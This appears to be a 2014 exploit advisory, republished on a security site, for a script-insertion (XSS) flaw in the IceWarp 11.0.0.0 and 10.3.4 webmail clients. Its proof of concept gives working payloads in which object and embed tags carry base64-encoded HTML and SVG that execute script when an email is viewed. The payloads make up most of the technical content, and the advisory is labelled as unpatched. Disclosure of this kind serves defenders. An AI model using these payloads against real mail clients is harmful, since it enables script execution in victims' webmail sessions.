ICEWARP 11.0.0.0 Script Insertion

2014.02.20
Credit: Usman Saeed
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Disclaimer: [This code is for Educational Purposes , I would Not be responsible for any misuse of this code] Attack type : Remote Patch Status : Unpatched Exploitation : # Author: Usman Saeed # Company: Xc0re Security Research Group # Website: http://www.xc0re.net # Twitter : http://twitter.com/emuess # Original Advisory DATE: [29/01/2014] # Publishing of Exploit Date : [17/02/2014] Description =========== It is possible to inject malicious HTML Elements into the email and cause a Cross site Scripting (XSS) payload to be executed. Tested ICEWARP Client Versions (http://www.icewarp.com/) ============================ Version : 11.0.0.0 (2014-01-25) x64 & 10.3.4 Browser Used ============= Mozilla Firefox 26.0 Proof Of Concept ============ Please find the details about the exploit : http://xc0re.net/blog/?p=363 Proof Of Concept ================= For Version: ICEWARP 11.0.0 &gt;<object data=?data:text/html;base64,PC9zY3JpcHQ+PGltZyBzcmM9Ing6eCIgb25lcnJvcj0iYWxlcnQoU3RyaW5nLmZyb21DaGFyQ29kZSg4OCwxMTUsMTE1KSkiIC8+?></object>&gt; &gt;<EMBED SRC=?data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==? type=?image/svg+xml? AllowScriptAccess=?always?></EMBED>&gt; Note: For Version: ICEWARP 10.3.4 <EMBED SRC=?data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==? type=?image/svg+xml? AllowScriptAccess=?always?></EMBED>

References:

http://xc0re.net/blog/?p=363


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top